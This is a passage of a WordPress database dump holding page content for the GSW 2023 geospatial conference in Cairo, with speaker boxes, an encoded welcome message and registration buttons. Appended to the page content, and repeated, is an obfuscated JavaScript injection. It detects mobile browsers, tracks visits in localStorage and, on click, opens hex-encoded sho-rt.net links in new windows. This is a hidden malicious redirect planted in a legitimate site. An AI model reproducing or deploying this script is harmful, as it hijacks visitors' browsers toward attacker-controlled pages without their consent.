)|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-07 12:58:13','2022-10-07 12:58:13','',2167,'https://gsw2023.com/?p=2386',0,'revision','',0),
(2391,1,'2022-10-07 13:14:04','2022-10-07 13:14:04','[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\"][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]\r\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\r\n[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]\r\n<h6>Geospatial Week Director ,The University of Calgary</h6>\r\n[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm.gsw2023.com%2Fpages%2Fregistration.html\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665131484276{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665123014762{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #3098E3), color-stop(54%, #6FA1D4), color-stop(81%, #488CBD), color-stop(95%, #3298CF));background: -moz-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -webkit-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -o-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -ms-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023 BY\" main_heading_color=\"#f27304\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_row_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"2325\" alignment=\"center\" onclick=\"custom_link\" img_link_target=\"_blank\" title=\"AASTMT\" link=\"https://aast.edu/en/\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"2326\" alignment=\"center\" onclick=\"custom_link\" img_link_target=\"_blank\" title=\"ISPRS\" link=\"https://www.isprs.org/\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return 